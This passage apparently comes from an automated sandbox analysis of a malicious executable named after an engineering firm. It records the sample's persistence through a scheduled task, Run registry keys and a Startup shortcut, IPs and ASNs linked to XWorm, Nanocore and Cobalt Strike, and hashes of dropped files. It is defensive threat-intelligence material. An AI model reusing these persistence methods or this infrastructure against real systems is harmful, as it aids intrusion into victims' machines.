                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: SS Bottmac Engineers Pvt. Ltd..exe

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        05:31:00API Interceptor6888574x Sleep call for process: SS Bottmac Engineers Pvt. Ltd..exe modified
                        05:31:03API Interceptor71x Sleep call for process: powershell.exe modified
                        05:31:06API Interceptor2x Sleep call for process: RTUZKYTc.exe modified
                        10:31:05Task SchedulerRun new task: RTUZKYTc path: C:\Users\user\AppData\Roaming\RTUZKYTc.exe
                        10:31:23AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SS Bottmac Engineers Pvt. Ltd. C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe
                        10:31:31AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SS Bottmac Engineers Pvt. Ltd. C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe
                        10:31:40AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SS Bottmac Engineers Pvt. Ltd..lnk

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        104.223.35.76IMG465244247443 ORDER Opmagasinering.exeGet hashmaliciousXWormBrowse
                          SecuriteInfo.com.Win32.MalwareX-gen.23086.24319.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                            rSolicita____odeCota____o.exeGet hashmaliciousXWormBrowse

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              ASN-QUADRANET-GLOBALUS.main.elfGet hashmaliciousXmrigBrowse
                              • 66.63.187.195
                              Proforma Invoice347.docGet hashmaliciousNanocoreBrowse
                              • 66.63.187.113
                              S1qgnlqr1V.exeGet hashmaliciousNanocoreBrowse
                              • 66.63.187.113
                              Quotation_PMV-1060_AVR1_PMV_1513_AVR1_PMV_1514_AVR1_PMV_1515.exeGet hashmaliciousGuLoader, StormKittyBrowse
                              • 204.44.127.85
                              splarm5.elfGet hashmaliciousUnknownBrowse
                              • 190.9.40.179
                              Master.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                              • 141.98.197.31
                              setup_office.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                              • 141.98.197.31
                              111.out.elfGet hashmaliciousUnknownBrowse
                              • 141.98.197.31
                              m68k.elfGet hashmaliciousMiraiBrowse
                              • 45.199.228.213
                              iQPxJrxxaj.exeGet hashmaliciousPikaBotBrowse
                              • 104.129.55.104

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RTUZKYTc.exe.log

                              Download File
                              Process:C:\Users\user\AppData\Roaming\RTUZKYTc.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1216
                              Entropy (8bit):5.34331486778365
                              Encrypted:false
                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                              Malicious:false
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SS Bottmac Engineers Pvt. Ltd..exe.log

                              Download File
                              Process:C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1216
                              Entropy (8bit):5.34331486778365
                              Encrypted:false
                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                              Malicious:true
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2232
                              Entropy (8bit):5.379633281639906
                              Encrypted:false
                              SSDEEP:48:NlWSU4xympjgs4RIoU99tK8NPZHUl7u1iMugeC/ZM0Uyus:NlLHxvCsIfA2KRHmOugw1s
                              MD5:0065122BB5759BA8A4BAC6ACDBEDC9DC
                              SHA1:353E9A4100CA43455810CD95CA78C5175F6F799F
                              SHA-256:214E4E0D00F3967A8F89D59A421B8556A61FEA2152BF5D730AEF5326779B24E0
                              SHA-512:131AA0A86C30FDBE14BCE5F104D69D133F646F213AB1AB37ECEDAAEE93BA07F6C705BCC9D50FBBCA184FC1EEE6A3DFD43D8F1B6EE45C631E0CD85D9BFD83AABB
                              Malicious:false
                              Preview:@...e.................................[..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                              C:\Users\user\AppData\Local\Temp\Log.tmp

                              Download File
                              Process:C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe
                              File Type:Generic INItialization configuration [WIN]
                              Category:dropped
                              Size (bytes):58
                              Entropy (8bit):3.598349098128234
                              Encrypted:false
                              SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovX:EFYJKDoWr5FYJKDoP
                              MD5:5362ACB758D5B0134C33D457FCC002D9
                              SHA1:BC56DFFBE17C015DB6676CF56996E29DF426AB92
                              SHA-256:13229E0AD721D53BF9FB50FA66AE92C6C48F2ABB785F9E17A80E224E096028A4
                              SHA-512:3FB6DA9993FBFC1DC3204DC2529FB7D9C6FE4E6F06E6C8E2DC0BE05CD0E990ED2643359F26EC433087C1A54C8E1C87D02013413CE8F4E1A6D2F380BE0F5EB09B
                              Malicious:false
                              Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ew04031.law.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1yxebe5j.g1k.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a1kkwmex.kdj.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a5jfgk3a.q4t.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bkgarccn.ioz.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bpb5ezlb.ysp.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bzs115o5.hoc.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c0iehe5c.4dv.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c5lurcm3.c5a.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cz0l5p2n.qac.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ean0vdtf.cj0.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ejpbso42.ox5.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jasetlow.33p.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l01lomss.d32.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qjd0u0bu.ogr.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sshyzuwv.2ym.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uglp4bwk.rkm.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xzxixvx3.t3m.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yh5iqusp.cvx.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yuahbm3e.mei.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\tmp2E66.tmp

                              Download File
                              Process:C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe
                              File Type:XML 1.0 document, ASCII text
                              Category:dropped
                              Size (bytes):1581
                              Entropy (8bit):5.1099289848386675
                              Encrypted:false
                              SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtWxvn:cgergYrFdOFzOzN33ODOiDdKrsuTav
                              MD5:AF0C00DEA3136F47ECD0634C9538B4C4
                              SHA1:FC8E0AC24790D0A383A39F6440C12DD2BEC93B7B
                              SHA-256:0AEC93A66EF83171D3D9DA10575FFE018B5E541FFDBB7DFA7C55E8A37A939E41
                              SHA-512:7264BE5C87E4B721FB309B43F7D38F548976EFFF4E5B9B4B7A0174402AC18ADB635A17713A4D8F9A6D2694A1E5E4900EC42C81C19F249874A8706755B1C791AE
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

